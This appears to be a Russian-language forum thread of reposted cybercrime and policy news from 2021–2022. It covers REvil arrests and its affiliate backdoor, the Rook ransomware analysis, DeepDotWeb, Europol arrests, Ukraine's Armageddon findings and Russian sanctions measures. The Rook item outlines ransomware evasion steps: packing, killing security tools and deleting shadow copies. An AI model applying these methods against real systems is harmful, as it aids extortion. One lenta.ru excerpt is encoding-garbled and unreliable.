Корреспондирующие поправки вносятся в УК РФ. Также вносятся поправки в Налоговый кодекс о возможности продления сроков уплаты налогов на федеральном и региональном уровнях.
Гарантии, предусмотренные амнистией, предусматриваются в случае перевода в РФ всех денежных средств или финансовых активов со счетов (вкладов) в банках или организациях финансового рынка, расположенных за пределами страны.
Амнистия капиталов предполагает освобождение от уголовной, налоговой, административной ответственности за определенные противоправные деяния. В частности, в рамках амнистии капитала декларант освобождается от уголовной ответственности за уклонение от уплаты таможенных платежей, специальных, антидемпинговых и (или) компенсационных пошлин в крупном либо особо крупном размере, уклонение от уплаты налогов и сборов. Освобождение от административной ответственности распространяется, например, на непредставление сведений, необходимых для осуществления налогового контроля, нарушения валютного законодательства РФ. Освобождение от налоговой ответственности применяется в отношении всех налоговых правонарушений, в том числе за несвоевременную уплату налога и непредставление декларации.
Click to expand...
На ряде электронных ресурсов появился предположительно проект плана правительства России о первоочередных мерах по обеспечению развития российской экономики в условиях внешнего санкционного давления.
Согласно плану, для поддержки российских информационных технологий предлагается механизм принудительного лицензирования в отношении ПО, баз данных и топологий для интегральных микросхем. На них может быть распространено действие ст. 1360 ГК РФ (по ней правительство РФ имеет право «в случае крайней необходимости» принять решение об использовании изобретения, полезной модели или промышленного образца без согласия патентообладателя).
Одной из мер поддержки обсуждается отмена уголовной и административной ответственности за использование пиратского программного обеспечения «из стран, поддержавших санкции». Мера поддержки, предположительно, будет изложена в виде Федерального закона, а ответственным лицом указано Минэкономразвития России.
В документе есть пункт 6.7.2 — в нём указана отмена компенсации иностранным компаниям, которые находятся в странах, поддержавших санкции, за результаты интеллектуальной деятельности. Проще говоря, это легальное пиратство фильмов, сериалов, книг и другого контента.
Сейчас, в соответствии со статьей 1301 ГК РФ за использование нелицензионного программного обеспечения установлена административная ответственность.
На фоне «специальной военной операции» в Украине хакерские группы разлились на два лагеря: одни заявили, что поддерживают действия российских властей, тогда как другие напротив встали на сторону Украины.
Издание Bleeping Computer рассказывает, что в хакерском сообществе наметился серьезный раскол.
К примеру, администратор БД и торговой площадки RaidForums открыто заявил, что вводит собственные санкции и блокирует доступ для пользователей из России. Он четко выразил свою позицию, заявив, что выступает против действий Кремля.
Другой участник RaidForums опубликовал еще более резкое сообщение в качестве предупреждения «русским». Также он выложил на форуме базу данных с адресами электронной почты и хешированными паролями и домена fsb.ru. Хотя подлинность этой информации пока никто не проверял, ранее этот же пользователь размещал аналогичные базы данных для американских доменов .mil.
Исследователи ИБ-компании SentinelLabs выявили новое семейство вымогательского ПО под названием Rook ("Ладья" – англ.). Хотя приветственное сообщение на сайте утечек Rook носит шуточный характер, первая указанная жертва свидетельствует о том, что вымогатели настроены серьезно.
По словам исследователей, полезная нагрузка Rook доставляется на атакуемую систему через Cobalt Strike, который в свою очередь попадает на устройство с помощью фишинговых писем или загрузки torrent-файлов.
С целью обхода обнаружения решениями безопасности полезная нагрузка упакована с помощью UPX или другого криптора. После выполнения вредонос предпринимает попытки завершить процессы, связанные с инструментами безопасности или с чем- либо, что может помешать шифрованию файлов.
С помощью vssadmin.exe Rook удаляет теневые копии томов – стандартная практика кибервымогателей, чтобы жертва не могла восстановить свои файлы без уплаты выкупа.
Специалисты не обнаружили никакого механизма персистентности, то есть, после шифрования файлов Rook добавляет к ним расширение .Rook, а затем удаляется с системы.
Исследователи SentinelLabs обнаружили в коде Rook много общего с кодом Babuk – более нефункционирующего RaaS (Ransomware as a Service – вымогательское ПО как услуга), чей весь исходный код утек на подпольные форумы в сентябре 2021 года. К примеру, Rook использует те же вызовы API для получения имени и статуса каждой запущенной службы и те же функции для их отключения. Список отключаемых процессов и служб Windows у обоих вымогателей одинаковый.
В настоящее время на сайте утечек Rook указаны только две жертвы, добавленные в текущем месяце, – банк и индийский специалист в области авиации и аэрокосмической техники. Если к партнерской программе Rook примкнут опытные киберпреступники, она может стать серьезной угрозой в будущем.
Source: sentinelone.com/labs/new-rook-ransomware-feeds-off-the-code-of-babuk
Хакеры из Anonymous объявили России "кибервойну"
ответственность за атаку на RT
Группа компьютерных взломщиков Anonymous объявила кибервойну России и взяла на себя ответственность за хакерскую атаку на сайт российского телеканала RT.
"Коллектив Anonymous официально объявляет войну России…", - говорится в заявлении группировки в Twitter. Хакеры добавили к своему сообщению хештег #Ukraine.
Телеканал RT ранее сообщал, что на его сайты с вечера четверга ведутся DDoS- атаки, причем порядка 27% адресов, с которых они совершаются, находятся в США.
Вечером в четверг с затруднениями также работали сайты Кремля, российского правительства, Госдумы и Совета Федерации. Пресс-секретарь президента Дмитрий Песков заявил, что сайт Кремля не подвергается DDoS-атаке.
Проведено 11 обысков по адресам их проживания и офисах, в которых было компьютерное оборудование.
Сотрудники МВД России пресекли деятельность группировки, участники которой
подозреваются в создании в интернете площадки для покупки и продажи
персональных данных пользователей систем дистанционного банковского
обслуживания. Об этом сообщила официальный представитель ведомства Ирина Волк.
Следователи возбудили уголовное дело по ч.2 статье 187 УК РФ "Неправомерный
оборот средств платежей". Проведено 11 обысков по адресам их проживания и
офисах, в которых было компьютерное оборудование. Полицейские нашли
компьютеры, мобильную технику и документы, доказывающие причастность
подозреваемых. В Перми, Саратове и Петербурге задержаны шесть фигурантов.
Изъяты предметы роскоши. Среди них оказались 24 золотых слитка 999 пробы весом
по 100 граммов каждый, три автомобиля премиум-класса и денежные средства в
размере 12 млн рублей.
У расчетного банка отозвали лицензию.
Все операции по российским кошелькам WebMoney становятся недоступны с 11 февраля из-за отзыва лицензии у расчетного банка. Об этом сообщается на официальном сайте WebMoney.
"В связи с отзывом лицензии у АО Банк "ККБ", гаранта и расчетного банка системы по рублевым кошельками, с 11 февраля 2022 года все операции c P и R-кошельками становятся недоступны", - говорится в сообщении платежной системы.
Click to expand...
По ее данным, замороженные в АО Банк "ККБ" электронные денежные средства участников системы будут выплачены их владельцам. "Система приложит все доступные юридические и финансовые усилия для скорейшей компенсации стоимости заблокированных инструментов", - говорится в сообщении.
Платежная система WebMoney считает, что ее расчетный банк никогда не был причастен к обслуживанию "теневого" игорного бизнеса, нелегальных участников финансового рынка, как было указано в пресс-релизе ЦБ. "Имеющиеся в нашем распоряжении тексты надуманных, не связанных с фактической деятельностью кредитной организации предписаний выглядят всего лишь как формальное соблюдение процедуры отзыва лицензии банка", - отмечается в сообщении. Там добавили, что регулятор "сделал недоступным работу с рублевыми кошельками для миллионов пользователей WebMoney".
Ранее сообщалось, что Банк России приказом от 11 февраля 2022 года отозвал лицензию на осуществление банковских операций у астраханского АО "Консервативный коммерческий банк" (ККБ), являющегося участником системы страхования вкладов. На сайте регулятора указывалось, что "ККБ" фактически не осуществлял традиционную банковскую деятельность, специализируясь на оказании услуг в области электронной коммерции. Банком не проводилась работа по изучению экономического смысла операций клиентов, источники денежных средств по которым были непрозрачны. Деятельности кредитной организации были присущи повышенные риски ее вовлечения в обслуживание "теневого" игорного бизнеса, нелегальных участников финансового рынка.
source: news.wmtransfer.com/blog/zayavlenie-dlya-vladeltsev-wmp-i-wmr- koshelkov
Согласно обвинительному заключению, начиная с октября 2013 года и далее до даты предъявления обвинения, Тал Прихар и его сообщник Майкл Фэн якобы владели и управляли DDW, размещенной на www.deepdotweb.com, а также доступной в Darknet на DeepDot35Wveyd5.onion.
DDW предоставил пользователям прямой доступ к многочисленным онлайн-рынкам Darknet, недоступным через традиционные поисковые системы, на которых продавцы предлагали на продажу незаконные наркотики, такие как фентанил, карфентанил, кокаин, героин и кристаллический метамфетамин, огнестрельное оружие, включая штурмовые винтовки, вредоносное программное обеспечение и хакерские инструменты; похищенная финансовая информация и платежные карты и номера; доступ к устройству изготовления оборудования и другой нелегальной контрабанде.
Прихар и Фэн получали платежи, представляющие собой комиссионные от выручки от каждой покупки нелегальных товаров, сделанных физическими лицами, которые обращались на рынки с сайта DDW. Эти платежи были сделаны в виртуальной валюте, такой как биткойны, и переведены в контролируемый DDW «кошелек биткойнов». Чтобы скрыть природу и источник незаконных доходов, на общую сумму более 15 миллионов долларов, Прихар и Фэн перечислили свои платежи с биткойн- кошелька DDW на другие биткойн-счета и на банковские счета своих подставных компаниях: WwwCom Ltd., M&T Marketing, Imtech, O.T.S.R. Biztech, и Tal Advanced Tech.
Приблизительно 23,6 процента всех заказов, выполненных на AlphaBay, были связаны со счетом, созданным по реферальной ссылке DDW.
В период с ноября 2014 года по 10 апреля 2019 года DDW получил примерно 8155 биткойнов в виде платежей с торговых площадок Darknet на сумму около 8 414 173 долл. США с учетом торговой стоимости биткойнов на момент каждой транзакции. Биткойн был переведен в биткойн-кошелек DDW, контролируемый обвиняемыми, в виде серии из более чем 40000 депозитов и был впоследствии выведен в различные пункты назначения, известные и неизвестные, посредством более 2700 транзакций. Из-за колебания обменного курса биткойнов стоимость биткойна на момент вывода средств из биткойн-кошелька DDW составляла приблизительно 15 489 415 долл. США.
Больше подробностей и само обвинительное заключение доступны по ссылке https://www.justice[.]gov/opa/pr/admi...aundering-conspiracy-relating- kickbacks-sales
Binance cryptocurrency exchange - We operate the worlds biggest bitcoin exchange and altcoin crypto exchange in the world by volume
 unicvv.ru
""
Этот ресурс заблокирован
Сервис UNICC закрыт навсегда в ходе спецоперации правоохранительных органов.
Управление "К" МВД России предупреждает: хищения денежных средств с банковских карт незаконны!
ст. 187 УК РФ: Изготовление, приобретение, хранение, транспортировка в целях
использования или сбыта, а равно сбыт поддельных платежных карт, распоряжений
о переводе денежных средств, документов или средств оплаты, а также
электронных средств, электронных носителей информации, технических устройств,
компьютерных программ, предназначенных для неправомерного осуществления
приема, выдачи, перевода денежных средств.
Наказывается лишением свободы на срок до семи лет."""
Ж В С С
Задержание членов группы REvil способно спровоцировать киберпреступников и активизировать их деятельность в России.
Задержание группы хакеров REvil может создать не только временные трудности для киберпреступников в России, но и негативно сказаться на благополучии отечественных компаний, считают эксперты Group-IB.
По словам руководителя лаборатории компьютерной криминалистики Group-IB Олега Скулкина, ранее многие русскоязычные хакеры не атаковали компании России и СНГ, поскольку это было для них небезопасно. Однако за последние два года атаки с использованием программ-вымогателей участились и здесь. Задержание REvil может их лишь подстегнуть, так как после удачных зарубежных операций они могут забыть про негласные запреты.
Скулкин отметил, что сложившаяся ситуация может негативно сказаться на российских компаниях — русскоязычные киберпреступники могут активнее их атаковать.
Ранее суд в Москве арестовал восьмерых предполагаемых членов хакерской группировки REvil которая получила известность на Западе после обвинений в масштабной кибератаке на американские компании. Основанием для их задержания в России послужило обращение со стороны США.
Источник : https://www.securitylab.ru/news/528748.php
ÑазмеÑÑили Ñам «ÑвинÑÑ» ](https://lenta.ru/news/2022/01/14/miboroni_ua/)
ÐеизвеÑÑнÑе ÑакеÑÑ Ð²Ð·Ð»Ð¾Ð¼Ð°Ð»Ð¸ ÑÐ°Ð¹Ñ ÐиниÑÑеÑÑÑва обÑÐ°Ð·Ð¾Ð²Ð°Ð½Ð¸Ñ Ð¸ наÑки УкÑÐ°Ð¸Ð½Ñ Ð¸ ÑазмеÑÑили на нем поÑлание Ñ ÑгÑозами на ÑÑÑÑком, полÑÑком и ÑкÑаинÑком ÑзÑкаÑ. ÐоÑле аÑаки Ñам поÑвилиÑÑ...
lenta.ru
Дискасс
Российский диджей Денис Казначеев, проживающий в Берлине, арестован в Германии по запросу США, которые требуют его экстрадиции по обвинению в отмывании денег и мошеннических действиях в интернете. Об этом сообщается на официальной странице музыканта в Facebook.
"Семь дней назад известный российский музыкант и диджей Денис Казначеев был арестован немецкой полицией от имени Министерства юстиции США, которое требует его немедленной экстрадиции в США по обвинению в отмывании денег и мошеннических действиях в интернете", - написано на странице артиста.
Авторы текста не исключают, что "личность [Казначеева] была украдена и использована для преступной деятельности".
Официальными комментариями полиции ФРГ, посольства РФ в Берлине и Минюста США ТАСС пока не располагает.
Сейчас Казначеев находится в германской тюрьме.
Атаковавший Kaseya Ярослав Васинский выступал в роли партнера вымогательской группировки REvil.
Небольшой городок Дубровица недалеко от северной границы Украины с Беларусью является родным городом Ярослава Васинского, которого власти США обвинили в проведении атак с использованием программы-вымогателя REvil (также известной как Sodinokibi).
22-летний Васинский был ответственен за атаку с помощью программы- вымогателя на поставщика программного обеспечения Kaseya, которая в конечном итоге затронула сотни клиентов.
Как сообщило издание Bloomberg, в социальных сетях и в своем родном городе Васинский обсуждал свои интересы и будущие устремления — юный компьютерный гений и фанат баскетбола, который хотел уехать из Дубровицы. Бывший учитель, директор школы и одноклассник описали его как тихого и дружелюбного.
Уже в старших классах Васинский мог легко отключить защиту, установленную на персональных компьютерах учеников, и выключить дистанционное управление учителя, не зная пароля. По словам учителя информатики Сергея Берестеня, Васинскому не нравилось, когда ему указывали.
«Он был в некотором роде гением, человеком, который видел каждую задачу по- своему. У него всегда была своя точка зрения. Когда я давал задание, он пытался решить его по-другому», — отметил Берестен.
В старших классах Васинский начал работать, ремонтируя мобильные телефоны и создавая web-сайты в качестве фрилансера, что позволило ему зарабатывать деньги на оплату обучения в колледже в Люблине, расположенном на востоке Польши.
В последние годы Васинский выполнял некоторую внештатную работу для новостного сайта компании Liga Inform (не имеет отношения к популярному украинскому интернет-изданию с похожим названием).
Согласно обвинительному заключению , с начала марта 2019 года по август 2021 года Васинский и его сообщники получили доступ к компьютерным сетям почти десятка организаций и компаний в Техасе и других местах, а затем установили вымогательское ПО и потребовали выкуп. В нескольких случаях после взлома компьютеров хакеры также проникли в сети клиентов, значительно увеличив круг жертв.
Как сообщалось в судебных документах, Васинский выступал в роли партнера вымогательской группировки REvil. Молодой человек действовал под псевдонимами Yarik45, Yaroslav2468 и Rabotnik. В начале июля 2019 года киберпреступник, использующий псевдоним Unknown, разместил объявление о поиске партнеров для распространения вымогателя Sodinokibi. Партнер сначала полагалось 60% доли от выкупа, а затем 70% после трех выплат. В середине декабря того же года Васинский отправил Unknown сообщение на подпольном форуме и предложил сотрудничество.
Васинский был арестован 8 октября нынешнего года во время пересечения границы между Украиной и Польшей. Ожидается, что он будет экстрадирован в США.
Почалось.
Чебурнет грядет.
Качайте и пишите на сидидиски треки с Элтоном Джоном

рунета — Meduza ](https://meduza.io/news/2021/12/03/zhiteli-rossii- pozhalovalis-na-blokirovku-tor)
Жители Москвы, Петербурга, Екатеринбурга и других российских городов столкнулись с тем, что не могут подключиться к сети Tor.
meduza.io
Все участники группировки некоторое время были активны на популярных хакерских форумах.
Аналитик по кибербезопасности испанского гиганта финансовых услуг Santander Group Хуан Антонио Веласко рассказал о недавних карьерных изменениях четырех предполагаемых участников вымогательской группировки REvil, использующих псевдонимы Orange, MRT, Kajit и 999.
Все они какое-то время были активны на различных подпольных форумах. Orange был(ла) главным администратором хакерского форума **** и сообщил(ла) подробности деятельности вымогательской группировки Babuk после ее атаки на столичное полицейское управление Вашингтона в апреле 2021 года. 999 был(ла) модератором форума ****. Kajit также выполнял(ла) некоторые обязанности модератора и действовал(ла) на конкурирующих форумах, таких как XXX и Exploit.
Киберпреступники сменили род деятельности 18 октября нынешнего года после того, как серверы группировки REvil были взломаны . Orange, MRT и 999 решили заняться частной деятельностью, а Kajit взял(ла) на себя роль администратора ****. Анализ трафика на криминальных форумах, проведенный Веласко, позволяет предположить, что он или она теперь поддерживает связь с операторами вымогателя REvil. Kajit также инициировал(ла) редизайн форума ****.
Как отметил исследователь, 18 октября серверы REvil были отключены, однако это не означает прекращение преступной деятельности группировки. По словам Веласко, операции теперь разделены между группами, которые взламывают сети, а затем продают доступ брокерам начального доступа. Последние, в свою очередь, перепродают возможность доступа хакерам, осуществляющим фактический взлом сетей жертвы, установку программ-вымогателей и кражу данных.
Брокеры доступа разделились на розничных и оптовых торговцев. Последние
продают наборы доступов к сетям по цене от $10 тыс. до $20 тыс. Розничные
продавцы продают доступы к отдельным сетям по цене от $300 до $1 тыс.
Злоумышленники активно ищут партнеров на форумах и прочих ресурсах. Между
брокерами начального доступа и преступниками складываются долгосрочные
отношения. Как отметил Веласко, форумы создают инструменты для безопасного
проведения транзакций.
Более того, администраторы форума **** обратились к китайским коллегам с предложением участвовать в обсуждениях, делиться советами и сотрудничать при атаках. Влиятельные пользователи и администраторы форума активно пытались общаться с новыми участниками форума на китайском языке с помощью машинного перевода.
BlackMatter уходит. Говорит власти давят и член групы пропал..
https://www.bleepingcomputer[.]com/...s-to-be-shutting-down-due-to-police- pressure/
12 TARGETED FOR INVOLVEMENT IN RANSOMWARE ATTACKS AGAINST CRITICAL INFRASTRUCTURE
These cyber actors represented a dangerous combination of aggressive disruption and high-stake targets
Click to expand...
A total of 12 individuals wreaking havoc across the world with ransomware attacks against critical infrastructure have been targeted as the result of a law enforcement and judicial operation involving eight countries.
These attacks are believed to have affected over 1 800 victims in 71 countries. These cyber actors are known for specifically targeting large corporations, effectively bringing their business to a standstill.
The actions took place in the early hours of 26 October in Ukraine and Switzerland. Most of these suspects are considered high-value targets because they are being investigated in multiple high-profile cases in different jurisdictions.
As the result of the action day, over USD 52 000 in cash was seized, alongside 5 luxury vehicles. A number of electronic devices are currently being forensically examined to secure evidence and identify new investigative leads.
THE TICKING TIME BOMB OF UNDETECTED MALWARE
The targeted suspects all had different roles in these professional, highly organised criminal organisations. Some of these criminals were dealing with the penetration effort, using multiple mechanisms to compromise IT networks, including brute force attacks, SQL injections, stolen credentials and phishing emails with malicious attachments.
Once on the network, some of these cyber actors would focus on moving laterally, deploying malware such as Trickbot, or post-exploitation frameworks such as Cobalt Strike or PowerShell Empire, to stay undetected and gain further access.
The criminals would then lay undetected in the compromised systems, sometimes for months, probing for more weaknesses in the IT networks before moving on to monetising the infection by deploying a ransomware. These cyber actors are known to have deployed LockerGoga, MegaCortex and Dharma ransomware, among others.
The effects of the ransomware attacks were devastating as the criminals had had the time to explore the IT networks undetected. A ransom note was then presented to the victim, which demanded the victim pay the attackers in Bitcoin in exchange for decryption keys.
A number of the individuals interrogated are suspected of being in charge of laundering the ransom payments: they would funnel the Bitcoin ransom payments through mixing services, before cashing out the ill-gotten gains.
INTERNATIONAL COOPERATION
International cooperation coordinated by Europol and Eurojust was central in identifying these threat actors as the victims were located in different geographical locations around the world.
Initiated by the French authorities, a joint investigation team (JIT) was set up in September 2019 between Norway, France, the United Kingdom and Ukraine with financial support of Eurojust and assistance of both Agencies. The partners in the JIT have since been working closely together, in parallel with the independent investigations of the Dutch and U.S. authorities, to uncover the actual magnitude and complexity of the criminal activities of these cyber actors to establish a joint strategy.
Eurojust established a coordination centre to facilitate cross-border judicial cooperation during the action day. In preparation of this, seven coordination meetings were held.
Europol’s European Cybercrime Centre (EC3) hosted operational meetings, provided digital forensic, cryptocurrency and malware support and facilitated the information exchange in the framework of the Joint Cybercrime Action Taskforce (J-CAT) hosted at Europol’s headquarters in The Hague.
More than 50 foreign investigators, including six Europol specialists, were deployed to Ukraine for the action day to assist the National Police with conducting jointly investigative measures. A Ukrainian cyber police officer was also seconded to Europol for two months to prepare for the action day.
This operation was carried out in the framework of the European Multidisciplinary Platform Against Criminal Threats (EMPACT).
The following authorities took part in this operation:
Press release: [https://www.europol.europa.eu/newsr...mware-attacks-against- critical- infrastructure](https://www.europol.europa.eu/newsroom/news/12-targeted-for- involvement-in-ransomware-attacks-against-critical-infrastructure)
Эксперты по кибербезопасности Службы безопасности Украины определили хакеров
из небезызвестной группы АРМАГЕДОН, ответственных за более 5000 кибератак на
украинские государственные органы и критически важные объекты инфраструктуры.
Установлено, что группировка является частью службы безопасности ФСБ,
действующей из Крыма, а также им, перешедшими на сторону России во время войны
полуострова в 2014 году, сообщает пресс-центр СБУ, сообщает Укринформ.
Украинское агентство безопасности раскрыло личности преступников, получило
неопровержимые доказательства их незаконной деятельности, в том числе
перехваченные телефонные звонки, несмотря на то, что в кольце использовалось
вредоносное ПО, произведенное ФСБ, а также средства онлайн-анонимности.
В настоящее время пятерым участникам преступной группы предъявлено обвинение в
государственной измене по ст. 111 Уголовного кодекса Украины.
По информации СБУ, хакерская группа «Армагедон» - это специальный проект ФСБ,
основной целью которого была Украина. Его работу координировал 18-й Центр
(Центр информационной безопасности) ФСБ, расположенный в Москве.
С начала, в 2014 году злоумышленники осуществили более 5000 кибератак и
преследовали попытки «заразить» более 1500 государственных компьютерных
систем.
Основные цели группы ФСБ заключались в следующем:
-Получение контроля над критически важной инфраструктурой (электростанции, системы отопления и водоснабжения);
-Сбор разведывательной информации о безопасности, обороне, а также о деятельности государственных органов;-
-Проведение психоопераций; а также
-Блокировка информационных систем.
Дальнейшее расследование, в том числе судебно-медицинская экспертиза,
проводится для привлечения к ответственности сотрудников ФСБ по обвинению в
шпионаже, несанкционированном вмешательстве в компьютерные системы и создании
вредоносного программного или аппаратного обеспечения.
В расследовании участвовали Управление кибербезопасности СБУ и Главное
разведывательное управление Министерства обороны, действующие под
процессуальным руководством Генеральной прокуратуры.
govât agencies ](https://www.ukrinform.net/rubric-crime/3344830-sbu- identifies-fsb-hackers-behind-over-5000-cyberattacks-on-ukraine-govt- agencies.html)
Cyber security experts with the SBU Security Service of Ukraine have identified hackers from the notorious ARMAGEDON group, responsible for more than 5,000 cyberattacks on Ukrainian government bodies and critical infrastructure facilities. â Ukrinform.
www.ukrinform.net
Хакеры из группировки REvil были вынуждены свернуть свою деятельность после осуществления международной операции по их обезвреживанию.
Хакеры из группировки REvil сами стали мишенью взлома и были вынуждены
свернуть деятельность в сети в результате международной операции. Об этом
[сообщает](https://www.reuters.com/technology/exclusive-governments-turn-
tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/) Reuters со
ссылкой на независимых экспертов по кибербезопасности, сотрудничающих с США.
Советник Секретной службы США по расследованию киберпреступлений Том
Келлерманн рассказал о совместной операции государств-единомышленников,
осуществивших подрывные действия против групп хакеров. Первыми были
обезврежены хакеры из группировки REvil, которая известна осуществлением
запуска вируса-вымогателя в систему нескольких американских ведомств.
По данным агентства, портал группировки под названием Happy Blog, где хакеры
публиковали имена жертв осуществленных ими кибератак, а также примеры
украденных данных, больше не доступен. Эксперты также отметили на форуме
киберпреступников записи от пользователя 0_neday, который, предположительно,
является одним из лидеров REvil: он объявил, что сервера группировки были
взломаны неизвестными и он "выходит из игры".
Проблемы у REvil начались в нынешнем году после
атак на компании JBS и Kaseya, и
в июле ей пришлось отключить
свои сайты в даркнете. Однако 9 сентября группировка неожиданно
вернулась ,
восстановив и свои сайты, и
платежные порталы. Несмотря на это, повторить былой успех возродившейся
группировке не удалось, более того, ей даже пришлось увеличить комиссионный
сбор для партнеров до 90%.
The dark web servers for the REvil ransomware operation have suddenly turned back on after an almost two-month absence. It is unclear if this marks their ransomware gang's return or the servers being turned on by law enforcement.
On July 2nd, the REvil ransomware gang, aka Sodinokibi, used a zero-day vulnerability in the Kaseya VSA remote management software to encrypt approximately 60 managed service providers (MSPs) and over 1,500 of their business customers.
REvil then demanded $ 5 million from MSPs for a decryptor or $ 44,999 for each encrypted extension at the individual businesses.
The gang also demanded $ 70 million for a master decryption key to decrypt all Kaseya victims but soon dropped the price to $ 50 million.
After the attack, the ransomware gang faced increasing pressure from law enforcement and the White House, who warned that the USA would take action themselves if Russia did not act upon threat actors in their borders.
Soon after, the REvil ransomware gang disappeared , and all of their Tor servers and infrastructure were shut down.
To this day, it is not clear what happened, but it left ransomware victims who wished to negotiate unable to do so and without the ability to restore files.
Mysteriously, Kaseya later received the master decryption key for the attack victims and stated it was from a trusted third party. It is believed that Russian intelligence received the decryption key from the threat actors and passed it along to the FBI as a gesture of goodwill.
Today, both the Tor payment / negotiation site and REvil's Tor 'Happy Blog' data leak site suddenly came back online.
The most current victim on the REvil data leak site was added on July 8th, 2021, just five days before REvil's mysterious disappearance.
Unlike the data leak site, which is functional, the Tor negotiation site does not appear to be fully operational yet. While it shows the login screen, as seen below, it does not allow victims to log into the site.
The gang's http://decoder.re/ is still offline at this time.
It is unclear at this time whether the ransomware gang is back in operation, the servers have been turned back on by mistake, or it is due to the actions of law enforcement.
bleepingcomputer[.]com/news/security/revil-ransomwares-servers-mysteriously- come-back-online/
Американский суд по настоянию прокуратуры освободил из-под стражи Игоря Калиничева, зачтя ему срок пребывания в предварительном заключении, постановив при этом конфисковать у него 135 тысяч долларов и обязав выплатить возмещение в размере почти 185 тысяч долларов.
Калиничев был также приговорен к отбыванию 500 часов принудительных работ; в течение трех лет он будет находиться под надзором полиции. Назначенное возмещение должно выплачивается ежемесячными взносами в размере 15% от полученного за этот период дохода, следует из материалов Федерального суда Южного округа Нью-Йорка, с которыми ознакомилось РАПСИ.
Выходец из Украины Калиничев, натурализованный гражданин США, является фигурантом уголовного дела о интернет-мошенничестве, по которому проходят более тридцати человек, включая граждан России, Казахстана, Азербайджана, Грузии, Украины, Турции и Латвии.
Согласно версии прокуратуры США, преступная схема по обману интернет- пользователей, в которую были вовлечены обвиняемые, в том числе Калиничев, действовала с ноября 2016 года по июль 2018 года.
Злоумышленники, выдавая себя за автомобильных дилеров, распространяли рекламу дорогостоящих товаров, в том числе ретроавтомобилей, и вступали в переговоры с теми, кого интересовали эти объявления. Затем ничего не подозревавшие покупатели переадресовывались на веб-сайты, где им предлагалось совершить оплату доставки выбранных товаров. После того как средства поступали на банковские счета злоумышленников, они прекращали всякое общение с обманутыми ими лицами, говорится в обвинительном заключении.
Преступники снимали деньги со счетов небольшими партиями, чтобы избежать лишнего внимания, в то время как часть средств переводилась на счета сообщников в Восточной Европе, отмечает обвинение.
По словам помощника директора ФБР Уильяма Суини-младшего, в результате ущерб обманутых покупателей превысил 4 миллиона долларов.
Обвиняемым по данному уголовному делу инкриминируется сговор с целью мошенничества и отмывания денежных средств. Максимальные сроки наказания по данным пунктам обвинения составляют 30 и 20 лет лишения свободы соответственно.
Из россиян по этому делу проходят: Кирилл Дедусев, Роман Дегтев, Станислав Лисицкий, Александр Стариков, Михаил Морозов, Игорь Стасовский, Николай Тупикин, Максим Суверин и Алексей Ливадный. Части граждан РФ уже назначены наказания в виде лишения свободы, конфискации средств и штрафов.
Бэкдор позволял операторам REvil перехватывать чаты их партнеров и жертв и получать всю сумму выплаченного выкупа.
ИБ-специалисты из компании Advanced Intelligence
обнаружили
бэкдор, который предположительно позволял операторам вымогательского REvil
перехватывать чаты их партнеров и жертв и получать всю сумму выплаченного
выкупа.
Когда партнер вымогателей взламывает сеть и пытается установить
персистентность на системе, операторы REvil передают партнеру полезную
нагрузку для заражения сети и шифрования данных. Если жертва платит выкуп,
партнерская группировка получает 70% от этой суммы за выполнение всей работы
по компрометации сети, краже данных и шифрованию. Участники REvil получают
оставшиеся 30% в обмен на предоставление программ-вымогателей, которые
партнеры используют для перехвата контроля над данными и системами жертв.
Однако если бы группировка REvil решила обмануть партнеров, то в таком случае
она получила всю сумму выплаты — 70% партнера в дополнение к своим 30%.
«Используя данный бэкдор, REvil могла перехватить беседы жертв во время
активных переговоров с партнерами и получить 70% выкупа, предназначенные
партнерам», — пояснили эксперты.
Специалисты Advanced Intelligence уже знали, что REvil использует двойные
чаты. В таких случаях с жертвой открываются два идентичных чата, один —
партнерской группировкой, а другой — операторами REvil. У ИБ-экспертов нет
свидетельств того, что руководство REvil использовало бэкдор для прекращения
партнерского чата, выдавая себя за жертву, которая решила прекратить
переговоры без платы выкупа, а затем продолжало переговоры с жертвой для
получения 100% дохода. Однако двойные чаты и существование бэкдора указывают
на готовность REvil осуществлять подобные махинации.
Как обнаружили специалисты, бэкдор был удален в последних версиях
вымогательского ПО REvil после того, как группировка
отключила свои серверы в июле
нынешнего года. Преступники переработали вредоносное ПО, предположительно для
«предотвращения использования бэкдора против новых жертв бывшими участниками
REvil, у которых есть доступ к бэкдору»
Один из участников русскоязычного хакерского форума Exploit возобновил претензии к REvil от мая нынешнего года.
Партнеры операторов вымогательского ПО REvil на русскоязычном хакерском форуме
потребовали от группировки расплатиться за украденную долю выкупа. Как ранее
писал SecurityLab, ИБ-
специалисты из компании Advanced Intelligence обнаружили бэкдор, который
предположительно позволял операторам вымогательского ПО REvil перехватывать
чаты их партнеров и жертв и получать всю сумму выплаченного выкупа.
Когда партнер вымогателей взламывает сеть и пытается обеспечить
персистентность на системе, операторы REvil передают партнеру полезную
нагрузку для заражения сети и шифрования данных. Если жертва платит выкуп,
партнерская группировка получает 70% от этой суммы за выполнение всей работы
по компрометации сети, краже данных и шифрованию. Участники REvil получают
оставшиеся 30% в обмен на предоставление программ-вымогателей, которые
партнеры используют для перехвата контроля над данными и системами жертв.
Но когда переговоры неожиданно загадочным образом проваливаются и партнеры
остаются ни с чем, у них возникают подозрения и они обращаются к подпольной
версии судей.
Как сообщил ресурс Threatpost, один из участников русскоязычного хакерского
форума Exploit использовал результаты отчета Advanced Intelligence для
возобновления претензий, предъявленных в мае нынешнего года группировке REvil.
Хакер повторил заявление от мая 2021 года на форуме Exploit, подтвердив
предположение AdvIntel — операторы REvil действительно создали бэкдор,
позволивший прерывать переговоры о выкупе между жертвами и партнерами,
запускать двойной чат и исключать из сделки партнеров, присваивая себе весь
выкуп.
По словам специалистов, не только обиженный партнер подтвердил обман со
стороны REvil. Представитель группировки LockBit также присоединился к
дискуссии и рассказал о бывших партнерах REvil, обманутых вымогателями.
Как предполагают эксперты, подтверждение обмана партнеров REvil приведет к
тому, что группировку будут избегать в киберпреступном сообществе, а ее
способность нанимать новых партнеров сильно ослабеет.
Источник : https://www.securitylab.ru/news/524997.php
Эксперты Microsoft [выпустили предупреждение](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-40444) о новой уязвимости нулевого дня в Microsoft MHTML (он же Trident), проприетарном движке браузера Internet Explorer. Проблема уже используется в реальных атаках на пользователей Office 365 и Office 2019 в Windows 10. Патча пока нет.
